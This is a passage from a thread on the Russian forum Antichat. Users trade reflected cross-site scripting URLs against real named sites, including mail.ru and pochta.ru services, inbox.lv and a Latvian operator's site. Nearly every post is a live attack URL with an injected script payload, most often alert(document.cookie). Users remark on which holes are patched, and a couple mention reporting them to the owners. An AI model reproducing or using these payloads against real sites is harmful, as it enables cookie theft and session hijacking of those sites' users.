ANTICHAT — форум по информационной безопасности, OSINT и технологиям

one.lv

http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Уже прикрыли))

http://win.mail.ru/cgi-bin/readmsg?id=12538544950000000180"><script>alert(doc ument.cookie)</script>

Тока не орем))
Тут мне прислали письмо с QUELLE ( заказывал себе хрень одну ) при вводе скрипта в адресную строку я получил свои куки, но на других эта XSS не работает т.к. соответственно письмицо у них отсутствует ... есть какие небудь предложения по этому поводу ? Если надо выложу скрин.

inbox.lv забугорный сайтец.
http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://story.travel.mail.ru/?<'<"><script>alert('Ruslan1817')</script><mod=story&country_id=44

http://story.travel.mail.ru/?%3C'%3C%22%3E%3Cscript%3Ealert('Ruslan1817')%3C/script%3E%3Cmod=story&country_id=44

Чтот не рабочии твои хсс

сообщил администрации, в общем можно сказать получил 120 $ ))

Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E
Там в поиске еще активка есть)